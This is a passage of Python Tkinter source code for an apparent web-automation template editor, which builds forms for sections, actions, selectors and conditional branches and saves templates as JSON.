self.varAllTemlate.append(AllData)\n elif (self.varActionType.get()==\"Update Template\"): \n AllSection=[]\n for titem in self.treev1.get_children():\n for vitem in self.varAllSection:\n if(self.treev1.item(titem)[\"values\"][0] ==vitem[\"sectionName\"]):\n AllSection.append(vitem)\n AllData={\"templateName\":str( self.varCurrentTemplateName.get()),\"url\": str(self.varCurrentUrl.get()) ,\"sections\":AllSection}\n for i, item in enumerate(self.varAllTemlate):\n if item[\"templateName\"] == self.varCurrentTemplateName.get():\n self.varAllTemlate[i] = AllData\n \n with open(os.path.join(self.config.FilePath, self.config.TemplateFileName), 'w', encoding='utf-8') as f:\n json.dump(self.varAllTemlate, f, ensure_ascii=False, indent=4,separators=(',',': ')) \n tk.messagebox.showinfo(\"showinfo\", \"Save Successfully\") \n if(ProcType==2):\n if(self.checkKey(self.frmHeader1.children,\"cmbSectionName\")):\n self.frmHeader1.children[\"cmbSectionName\"].focus_set()\n if(self.checkKey(self.frmHeader1.children,\"txtSectionName\")):\n self.frmHeader1.children[\"txtSectionName\"].focus_set() \n\n def fncOpenChildForm(self,IsUpdate): \n if(IsUpdate):\n selected_items = self.treev1.selection() \n if(selected_items==None or len(selected_items)==0):\n tk.messagebox.showerror(\"Error\", \"Select the section\")\n self.IsUpdateSection=False\n return\n else:\n for x in selected_items:\n print(self.treev1.item(x)[\"values\"][0]) \n self.var_sectionName.set(self.treev1.item(x)[\"values\"][0]) \n self.IsUpdateSection=True\n \n else:\n self.varCurrentSection=None\n self.IsUpdateSection=False\n containter = tk.Toplevel(self.ContainerFrame,name=\"frmChildForm\") \n if(IsUpdate):\n containter.title(\"Update Section\")\n else:\n containter.title(\"Add Section\")\n containter.geometry(\"600x400\")\n innercontainter=ttk.Frame(containter)\n innercontainter.pack(expand=tk.TRUE,fill=tk.BOTH)\n innercontainter.columnconfigure(0, weight=1)\n innercontainter.rowconfigure(0, weight=1)\n innercontainter.rowconfigure(1, weight=100)\n\n self.frmHeader1=ttk.Frame(innercontainter)\n self.frmHeader1.grid(row=0,column=0)\n self.frmHeader1.columnconfigure(0, weight=1)\n self.frmHeader1.columnconfigure(1, weight=1)\n self.frmHeader1.columnconfigure(2, weight=100)\n self.frmHeader1.rowconfigure(0, weight=1)\n self.frmHeader1.rowconfigure(1, weight=1)\n self.frmHeader1.rowconfigure(2, weight=1)\n self.frmHeader1.rowconfigure(3, weight=1)\n self.frmHeader1.rowconfigure(4, weight=1)\n \n cmbSectionName=None\n ttk.Label(self.frmHeader1,text = \"Section Name :\").grid(row=0,column = 0,padx=(10, 10), pady=(20, 2), sticky=tk.N+tk.S+tk.E) \n if(IsUpdate):\n cmbSectionName=ttk.Combobox(self.frmHeader1, name=\"cmbSectionName\", width = 24,state=\"readonly\" , textvariable = self.var_sectionName, values=self.var_allSectionName)\n cmbSectionName.grid(row=0,column = 1,padx=(10, 10), pady=(20, 2))\n else:\n ttk.Entry(self.frmHeader1, width = 26, name=\"txtSectionName\", textvariable = self.var_sectionName).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2)) \n\n ttk.Label(self.frmHeader1,text = \"Section Category :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n cmbSectionCategory=ttk.Combobox(self.frmHeader1, width = 24,state=\"readonly\", textvariable = self.var_sectionCategory, values=self.var_allSectionCategory)\n cmbSectionCategory.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2))\n\n ttk.Label(self.frmHeader1,text = \"Section Type :\").grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E) \n ttk.Entry(self.frmHeader1, width = 26,state=\"readonly\", textvariable = self.var_sectionType).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2))\n \n \n\n ttk.Button(self.frmHeader1, text =\"Save\", width=10, command =lambda: self.fncSaveData(2)).grid(row=5,column = 1 , padx=(10,0),pady=(3,5),sticky=tk.N+tk.W)\n\n frmbtn1 = ttk.Frame(self.frmHeader1,name=\"frmTreeviewhandler1\")\n frmbtn1.grid(row=3,column = 1, columnspan=4, sticky=tk.N+tk.W+tk.E)\n btnAddAction = ttk.Button ( frmbtn1,name=\"btnAddAction\" , image=self.config.ico_add ,command =lambda: self.fncAddInnerChildForm() ) \n btnEditAction = ttk.Button ( frmbtn1,name=\"btnEditAction\" , image=self.config.ico_edit ,command =lambda: self.fncUpdateInnerChildForm() ) \n btnRemoveAction = ttk.Button ( frmbtn1,name=\"btnRemoveAction\", image=self.config.ico_delete, state=tk.DISABLED, command =lambda: self.fncRemove(2) )\n btnMoveUpAction = ttk.Button ( frmbtn1,name=\"btnMoveUpAction\", image=self.config.ico_up, state=tk.DISABLED, command =lambda: self.fncMoveUp(2) )\n btnMoveDownAction = ttk.Button ( frmbtn1,name=\"btnMoveDownAction\", image=self.config.ico_down,state=tk.DISABLED, command =lambda: self.fncMoveDown(2) )\n btnAddAction.grid(row=0,column = 0, padx=(10,0),pady=(3,5))\n btnEditAction.grid(row=0,column = 1, padx=(10,0),pady=(3,5))\n btnRemoveAction.grid(row=0,column =2, padx=(10,0),pady=(3,5))\n btnMoveUpAction.grid(row=0,column =3, padx=(10,0),pady=(3,5))\n btnMoveDownAction.grid(row=0,column =4, padx=(10,0),pady=(3,5))\n\n frmBody=ttk.Frame(innercontainter)\n frmBody.grid(row=1,column = 0, sticky=tk.N+tk.S+tk.W+tk.E)\n self.treev2 = ttk.Treeview(frmBody, selectmode ='browse')\n # Constructing vertical scrollbar\n # with treeview\n verscrlbar = ttk.Scrollbar(frmBody,orient =\"vertical\",command = self.treev2.yview)\n horscrlbar = ttk.Scrollbar(frmBody,orient =\"horizontal\",command = self.treev2.xview)\n\n # Calling pack method w.r.to vertical\n # scrollbar\n verscrlbar.pack(side ='right', fill ='y')\n horscrlbar.pack(side ='bottom', fill ='x')\n self.treev2.pack(fill=tk.BOTH,expand=True,pady=(10,10))\n # Configuring treeview\n self.treev2.configure(xscrollcommand = horscrlbar.set, yscrollcommand=verscrlbar.set)\n\n # Defining number of columns\n self.treev2[\"columns\"] = (\"actionId\", \"actionType\", \"startupType\",\"selectorType\",\"control\",\"inputType\",\"manualValue\",\"ioValue\",\"nextActionId\",\n \"conditionType\",\"leftInputType\",\"leftManualValue\",\"leftIOValue\",\"trueActionId\",\n \"rightInputType\",\"rightManualValue\",\"rightIOValue\",\"falseActionId\")\n # Defining heading\n self.treev2['show'] = 'headings'\n # Assigning the width and anchor to the\n # respective columns\n self.treev2.column(\"actionId\", stretch=tk.NO, width = 50, anchor ='nw')\n self.treev2.column(\"actionType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"startupType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"selectorType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"control\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"inputType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"manualValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"ioValue\", stretch=tk.NO, width = 150, anchor ='nw')\n self.treev2.column(\"nextActionId\", stretch=tk.NO, width = 50, anchor ='nw')\n self.treev2.column(\"conditionType\", stretch=tk.NO, width = 50, anchor ='nw')\n self.treev2.column(\"leftInputType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"leftManualValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"leftIOValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"trueActionId\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"rightInputType\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"rightManualValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"rightIOValue\", stretch=tk.NO, width = 100, anchor ='nw')\n self.treev2.column(\"falseActionId\", stretch=tk.NO, width = 50, anchor ='nw')\n \n # Assigning the heading names to the\n # respective columns\n self.treev2.heading(\"actionId\", text =\"Id\")\n self.treev2.heading(\"actionType\", text =\"Action Type\")\n self.treev2.heading(\"startupType\", text =\"Startup Type\")\n self.treev2.heading(\"selectorType\", text =\"Selector Type\")\n self.treev2.heading(\"control\", text =\"Control\")\n self.treev2.heading(\"inputType\", text =\"Input Type\")\n self.treev2.heading(\"manualValue\", text =\"manualValue\")\n self.treev2.heading(\"ioValue\", text =\"IO Value\")\n self.treev2.heading(\"nextActionId\", text =\"Next Action\") \n\n self.treev2.heading(\"conditionType\", text =\"Condition Type\") \n self.treev2.heading(\"leftInputType\", text =\"Left Input Type\") \n self.treev2.heading(\"rightInputType\", text =\"Right Input Type\") \n self.treev2.heading(\"leftManualValue\", text =\"Left Manual Value\") \n self.treev2.heading(\"rightManualValue\", text =\"Right Manual Value\") \n self.treev2.heading(\"leftIOValue\", text =\"left IO Value\") \n self.treev2.heading(\"rightIOValue\", text =\"right IO Value\") \n self.treev2.heading(\"trueActionId\", text =\"True Action Id\") \n self.treev2.heading(\"falseActionId\", text =\"False Action Id\") \n\n self.treev2.bind(\"\", lambda event: self.fncMoveItems(event,2))\n if(cmbSectionName!=None):\n self.BindExistingTreeview(None,2)\n cmbSectionName.bind(\"<>\", lambda event: self.BindExistingTreeview(event,2))\n if(cmbSectionCategory!=None):\n self.BindSectionType(None)\n cmbSectionCategory.bind(\"<>\", lambda event: self.BindSectionType(event))\n containter.grab_set()\n \n def fncChangeActionType(self,event):\n if(self.var_actionType.get()==\"Condition\" or self.var_actionType.get()==\"Find Index\"):\n if(self.chdFrm1 != None):\n self.chdFrm1.grid_forget()\n if(self.chdFrm2 != None):\n self.chdFrm2.grid(row=3,column=0,columnspan=4)\n else:\n if(self.chdFrm2 != None):\n self.chdFrm2.grid_forget()\n if(self.chdFrm1 != None):\n self.chdFrm1.grid(row=2,column=0,columnspan=4)\n \n def fncChangeInputType(self,event,ProcType=1):\n if(ProcType==1):\n if(self.var_inputType.get()==\"ManualValue\"):\n (self.chdFrm1.children[\"lblManualValue\"]).grid(row=1,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n (self.chdFrm1.children[\"txtManualValue\"]).grid(row=1,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n (self.chdFrm1.children[\"frmchdFrm1_1\"]).grid_forget()\n elif(self.var_inputType.get()==\"IOValue\"):\n (self.chdFrm1.children[\"lblManualValue\"]).grid_forget()\n (self.chdFrm1.children[\"txtManualValue\"]).grid_forget()\n (self.chdFrm1.children[\"frmchdFrm1_1\"]).grid(row=2,column = 0,padx=(10, 10), pady=(0, 0), columnspan=4,sticky=tk.N+tk.W) \n else:\n self.var_inputType.set(\"ManualValue\")\n (self.chdFrm1.children[\"lblManualValue\"]).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n (self.chdFrm1.children[\"txtManualValue\"]).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n (self.chdFrm1.children[\"frmchdFrm1_1\"]).grid_forget()\n elif(ProcType==2):\n if(self.var_leftInputType.get()==\"ManualValue\"):\n (self.chdFrm2.children[\"lblLeftManualValue\"]).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtLeftManualValue\"]).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_1\"]).grid_forget()\n elif(self.var_leftInputType.get()==\"IOValue\"):\n (self.chdFrm2.children[\"lblLeftManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"txtLeftManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"frmchdFrm2_1\"]).grid(row=2,column = 0,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n else:\n self.var_leftInputType.set(\"ManualValue\")\n (self.chdFrm2.children[\"lblLeftManualValue\"]).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtLeftManualValue\"]).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_1\"]).grid_forget()\n elif(ProcType==3):\n if(self.var_rightInputType.get()==\"ManualValue\"):\n (self.chdFrm2.children[\"lblRightManualValue\"]).grid(row=2,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtRightManualValue\"]).grid(row=2,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_2\"]).grid_forget()\n elif(self.var_rightInputType.get()==\"IOValue\"):\n (self.chdFrm2.children[\"lblRightManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"txtRightManualValue\"]).grid_forget()\n (self.chdFrm2.children[\"frmchdFrm2_2\"]).grid(row=2,column = 2,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n else:\n self.var_rightInputType.set(\"ManualValue\")\n (self.chdFrm2.children[\"lblRightManualValue\"]).grid(row=2,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.E)\n (self.chdFrm2.children[\"txtRightManualValue\"]).grid(row=2,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.W)\n (self.chdFrm2.children[\"frmchdFrm2_2\"]).grid_forget()\n \n def fncUpdateInnerChildForm(self): \n selected_items = self.treev2.selection() \n for x in selected_items: \n self.var_actionId.set(self.treev2.item(x)[\"values\"][0]) \n self.var_actionType.set(self.treev2.item(x)[\"values\"][1]) \n self.var_ActionStartupType.set(self.treev2.item(x)[\"values\"][2]) \n self.var_controlSelectorType.set(self.treev2.item(x)[\"values\"][3]) \n self.var_control.set(self.treev2.item(x)[\"values\"][4]) \n self.var_inputType.set(self.treev2.item(x)[\"values\"][5]) \n self.var_manualValue.set(self.treev2.item(x)[\"values\"][6]) \n self.var_ioValue.set(self.treev2.item(x)[\"values\"][7]) \n self.var_nextActionId.set(self.treev2.item(x)[\"values\"][8]) \n self.var_conditionType.set(self.treev2.item(x)[\"values\"][9]) \n self.var_leftInputType.set(self.treev2.item(x)[\"values\"][10]) \n self.var_leftManualValue.set(self.treev2.item(x)[\"values\"][11]) \n self.var_leftIOValue.set(self.treev2.item(x)[\"values\"][12]) \n self.var_trueActionId.set(self.treev2.item(x)[\"values\"][13]) \n self.var_rightInputType.set(self.treev2.item(x)[\"values\"][14]) \n self.var_rightManualValue.set(self.treev2.item(x)[\"values\"][15]) \n self.var_rightIOValue.set(self.treev2.item(x)[\"values\"][16]) \n self.var_falseActionId.set(self.treev2.item(x)[\"values\"][17]) \n \n self.treev2_selected_items=x\n self.treev2_selected_index=self.treev2.index(x)\n self.IsUpdateAction=True\n self.fncOpenInnerChildForm()\n\n def fncAddInnerChildForm(self):\n self.IsUpdateAction=False\n self.fncOpenInnerChildForm()\n \n def fncOpenInnerChildForm(self): \n containter = tk.Toplevel(self.frmHeader1) \n containter.title(\"Add Action\")\n containter.geometry(\"700x400\")\n innercontainter=ttk.Frame(containter) \n innercontainter.pack(expand=\"True\",fill=tk.BOTH,anchor=\"nw\",side=tk.LEFT)\n innercontainter.columnconfigure(0, weight=1)\n innercontainter.rowconfigure(0, weight=1)\n chdFrm=ttk.Frame(innercontainter) \n chdFrm.grid(row=0,column=0,sticky=tk.N+tk.W)\n chdFrm.columnconfigure(0, weight=1)\n chdFrm.columnconfigure(1, weight=1)\n chdFrm.columnconfigure(2, weight=1)\n chdFrm.columnconfigure(3, weight=1)\n chdFrm.rowconfigure(0, weight=1)\n chdFrm.rowconfigure(1, weight=1)\n chdFrm.rowconfigure(2, weight=1)\n chdFrm.rowconfigure(3, weight=1)\n chdFrm.rowconfigure(4, weight=1) \n\n ttk.Label(chdFrm,text = \"Action ID :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(chdFrm, width = 26, textvariable = self.var_actionId).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm,text = \"Action Type :\").grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbActionType=ttk.Combobox(chdFrm, width = 24, textvariable = self.var_actionType, values=self.var_allActionType)\n cmbActionType.grid(row=0,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n \n ttk.Label(chdFrm,text = \"Startup Type :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n rdoFrm=ttk.Frame(chdFrm)\n rdoFrm.grid(row=1,column = 1,padx=(10, 10),columnspan=3, pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Radiobutton(rdoFrm,text=\"Start\",value=\"Start\",variable = self.var_ActionStartupType).grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Radiobutton(rdoFrm,text=\"End\",value=\"End\",variable = self.var_ActionStartupType).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Radiobutton(rdoFrm,text=\"Middle\",value=\"Middle\",variable = self.var_ActionStartupType).grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n self.chdFrm1=None\n self.chdFrm1=ttk.Frame(chdFrm) \n self.chdFrm1.grid(row=2,column=0,columnspan=4)\n self.chdFrm1.columnconfigure(0, weight=1)\n self.chdFrm1.columnconfigure(1, weight=1)\n self.chdFrm1.columnconfigure(2, weight=1)\n self.chdFrm1.columnconfigure(3, weight=1)\n self.chdFrm1.rowconfigure(0, weight=1)\n self.chdFrm1.rowconfigure(1, weight=1)\n self.chdFrm1.rowconfigure(2, weight=1)\n\n ttk.Label(self.chdFrm1,text = \"Selector Type :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Combobox(self.chdFrm1, width = 24,state=\"readonly\" , textvariable = self.var_controlSelectorType, values=self.var_allSelectorType).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm1,text = \"Control :\" ).grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm1, name=\"txtControl\",width = 26, textvariable = self.var_control).grid(row=0,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n ttk.Label(self.chdFrm1,text = \"Input Type :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbInputType =ttk.Combobox(self.chdFrm1, width = 24,state=\"readonly\" , textvariable = self.var_inputType, values=self.var_allInputType)\n cmbInputType.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n ttk.Label(self.chdFrm1,name=\"lblManualValue\" ,text = \"Manual Value :\" ).grid(row=1,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n self.txtManualValue=ttk.Entry(self.chdFrm1,name=\"txtManualValue\", width = 26, textvariable = self.var_manualValue)\n self.txtManualValue.grid(row=1,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n chdFrm1_1=ttk.LabelFrame(self.chdFrm1,name=\"frmchdFrm1_1\",text=\"Choose IO Value\",style=\"Details.TLabelframe\")\n chdFrm1_1.grid(row=2,column = 0,columnspan=4,sticky=tk.N+tk.W)\n ttk.Label(chdFrm1_1,text = \"Function Name :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_0_FunctionName=ttk.Combobox(chdFrm1_1, width = 24,state=\"readonly\" , textvariable = self.var_0_FunctionName, values=self.val_AllFunctionName)\n cmbvar_0_FunctionName.grid(row=0,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm1_1, text = \"Section Name :\").grid(row=0,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_0_SectionName=ttk.Combobox(chdFrm1_1, width = 24,state=\"readonly\" , textvariable = self.var_0_SectionName,values=self.var_allSectionCategory)\n cmbvar_0_SectionName.grid(row=0,column = 3,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm1_1 ,text = \"Key Name :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_0_KeyName=ttk.Combobox(chdFrm1_1, name=\"var_0_KeyName\",width = 24,state=\"readonly\" , textvariable = self.var_0_KeyName)\n cmbvar_0_KeyName.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm1_1, text = \"IO Value :\").grid(row=1,column = 2,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.E)\n self.txtIOValue=ttk.Entry(chdFrm1_1,name=\"txtIOValue\" ,width = 26,state=\"readonly\" , textvariable = self.var_ioValue)\n self.txtIOValue.grid(row=1,column = 3,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.W)\n\n cmbvar_0_FunctionName.bind(\"<>\", lambda event: self.BindKeyName(1,False))\n cmbvar_0_SectionName.bind(\"<>\", lambda event: self.BindKeyName(1,True))\n cmbvar_0_KeyName.bind(\"<>\", lambda event: self.BindKeyName(1,False))\n\n ttk.Label(self.chdFrm1,text = \"Next Action Id :\").grid(row=3,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm1, width = 26, textvariable = self.var_nextActionId).grid(row=3,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n \n self.chdFrm2=None\n self.chdFrm2=ttk.Frame(chdFrm) \n self.chdFrm2.grid(row=4,column=0,columnspan=4)\n self.chdFrm2.columnconfigure(0, weight=1)\n self.chdFrm2.columnconfigure(1, weight=1)\n self.chdFrm2.columnconfigure(2, weight=1)\n self.chdFrm2.columnconfigure(3, weight=1)\n self.chdFrm2.columnconfigure(4, weight=1)\n self.chdFrm2.rowconfigure(0, weight=1)\n self.chdFrm2.rowconfigure(1, weight=1)\n self.chdFrm2.rowconfigure(2, weight=1)\n self.chdFrm2.rowconfigure(3, weight=1)\n\n ttk.Label(self.chdFrm2,text = \"Condition Type :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Combobox(self.chdFrm2, width = 24, textvariable = self.var_conditionType, values=self.var_allConditionType).grid(row=0,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm2,text = \"Left Input Type :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbLeftInputType=ttk.Combobox(self.chdFrm2, width = 24,state=\"readonly\" , textvariable = self.var_leftInputType, values=self.var_allInputType)\n cmbLeftInputType.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n ttk.Label(self.chdFrm2,name=\"lblLeftManualValue\",text = \"Left Manual Value :\" ).grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm2,name=\"txtLeftManualValue\" ,width = 26, textvariable = self.var_leftManualValue).grid(row=2,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n chdFrm2_1=ttk.LabelFrame(self.chdFrm2,name=\"frmchdFrm2_1\",text=\"Choose Left IO Value\",style=\"Details.TLabelframe\")\n chdFrm2_1.grid(row=3,column = 0,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n\n ttk.Label(chdFrm2_1,text = \"Function Name :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_1_FunctionName=ttk.Combobox(chdFrm2_1, width = 24,state=\"readonly\" , textvariable = self.var_1_FunctionName, values=self.val_AllFunctionName)\n cmbvar_1_FunctionName.grid(row=0,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_1, text = \"Section Name :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_1_SectionName=ttk.Combobox(chdFrm2_1, width = 24,state=\"readonly\" , textvariable = self.var_1_SectionName,values=self.var_allSectionCategory)\n cmbvar_1_SectionName.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_1 ,text = \"Key Name :\").grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_1_KeyName=ttk.Combobox(chdFrm2_1, name=\"var_1_KeyName\",width = 24,state=\"readonly\" , textvariable = self.var_1_KeyName)\n cmbvar_1_KeyName.grid(row=2,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_1, text = \"IO Value :\").grid(row=3,column = 0,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.E)\n txtLeftIOValue=ttk.Entry(chdFrm2_1,name=\"txtLeftIOValue\" ,width = 26,state=\"readonly\" , textvariable = self.var_leftIOValue)\n txtLeftIOValue.grid(row=3,column = 1,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.W)\n\n cmbvar_1_FunctionName.bind(\"<>\", lambda event: self.BindKeyName(2,False))\n cmbvar_1_SectionName.bind(\"<>\", lambda event: self.BindKeyName(2,True))\n cmbvar_1_KeyName.bind(\"<>\", lambda event: self.BindKeyName(2,False))\n\n # ttk.Label(self.chdFrm2,text = \"Left IOValue :\" ).grid(row=3,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n # ttk.Entry(self.chdFrm2, width = 26, textvariable = self.var_leftIOValue).grid(row=3,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm2,text = \"True Next ActionId :\" ).grid(row=4,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm2, width = 26, textvariable = self.var_trueActionId).grid(row=4,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm2,text = \"Right Input Type :\").grid(row=1,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbRightInputType=ttk.Combobox(self.chdFrm2, width = 24, textvariable = self.var_rightInputType, values=self.var_allInputType)\n cmbRightInputType.grid(row=1,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm2,name=\"lblRightManualValue\" ,text = \"Right Manual Value :\" ).grid(row=2,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm2,name=\"txtRightManualValue\" ,width = 26, textvariable = self.var_rightManualValue).grid(row=2,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n\n chdFrm2_2=ttk.LabelFrame(self.chdFrm2,name=\"frmchdFrm2_2\",text=\"Choose Right IO Value\",style=\"Details.TLabelframe\")\n chdFrm2_2.grid(row=3,column = 2,columnspan=2,padx=(10, 10),sticky=tk.N+tk.W)\n\n ttk.Label(chdFrm2_2,text = \"Function Name :\").grid(row=0,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_2_FunctionName=ttk.Combobox(chdFrm2_2, width = 24,state=\"readonly\" , textvariable = self.var_2_FunctionName, values=self.val_AllFunctionName)\n cmbvar_2_FunctionName.grid(row=0,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_2, text = \"Section Name :\").grid(row=1,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_2_SectionName=ttk.Combobox(chdFrm2_2, width = 24,state=\"readonly\" , textvariable = self.var_2_SectionName,values=self.var_allSectionCategory)\n cmbvar_2_SectionName.grid(row=1,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_2 ,text = \"Key Name :\").grid(row=2,column = 0,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n cmbvar_2_KeyName=ttk.Combobox(chdFrm2_2, name=\"var_2_KeyName\",width = 24,state=\"readonly\" , textvariable = self.var_2_KeyName)\n cmbvar_2_KeyName.grid(row=2,column = 1,padx=(10, 10), pady=(5, 2),sticky=tk.N+tk.S+tk.W)\n ttk.Label(chdFrm2_2, text = \"IO Value :\").grid(row=3,column = 0,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.E)\n txtRightIOValue=ttk.Entry(chdFrm2_2,name=\"txtRightIOValue\" ,width = 26,state=\"readonly\" , textvariable = self.var_rightIOValue)\n txtRightIOValue.grid(row=3,column = 1,padx=(10, 10), pady=(5, 5), sticky=tk.N+tk.S+tk.W)\n\n cmbvar_2_FunctionName.bind(\"<>\", lambda event: 